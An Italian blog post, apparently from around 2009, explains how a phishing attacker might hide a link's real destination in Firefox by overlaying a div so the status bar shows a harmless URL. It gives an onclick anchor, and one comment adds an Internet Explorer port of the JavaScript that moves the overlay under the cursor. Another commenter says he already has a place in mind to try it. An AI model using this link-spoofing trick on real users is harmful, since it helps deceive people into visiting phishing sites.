Il phishing è uno dei fenomeni (di sicurezza) di massa che attualmente affligge il mondo dell’utenza internet, lo diceva due anni fa gartner ed oggi siamo proprio nella “mainstream adoption”:
London, UK, September 18, 2006 — Gartner, Inc. today advised businesses to plan for five increasingly prevalent cyberthreats that have the potential to inflict significant damage on organisations during the next two years. They are; targeted threats, identity theft, spyware, social engineering and viruses.
via New Gartner Hype Cycle Highlights Five High Impact IT Security Risks.
tratto da http://en.wikipedia.org/wiki/Phishing
Ma come perpetuare un attacco di questo tipo?
Visto che oggi più che mai mi sento per la full disclosure, non vi farò attendere troppo
Se fossi un attaccante e volessi fare del phishing il primo problema che mi si pone è quello di non mettere in allerta l’attaccato. Purtroppo, o per fortuna, i vecchi metodi di link manipulation fanno scattare tutti gli strumenti di alerting che abbiamo più o meno installato sulla macchina… allora? Come fare?
ClickJacking: ovvero come offuscare la barra di un browser (nell’esempio firefox) per nascondere il sito target
Una div :
una semplice function JS:
ed un onclick:
<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a>
… garantiscono il risultato 
Provare per credere, buona serata
PS: La “vulnerabilità” è data per FireFox 3.0.5 … io uso la 3.1beta2 tirate voi le vostre conclusioni!
Post correlati:
{ 2 comments… read them below or add one }
Testato personalmente!!!
Io ho in mente già dove provarlo… ma la mia è solo un’idea
Affascinante bastardata!
Mi permetto di postare il porting su IE:
function updatebox() { var mouseX=window.event.clientX; var mouseY=window.event.clientY; document.getElementById('mydiv').style.left=mouseX-2; // Occhio: non -1 document.getElementById('mydiv').style.top=mouseY-2; // Occhio: non -1 }Il div ‘myDiv’ può essere anche 1×1px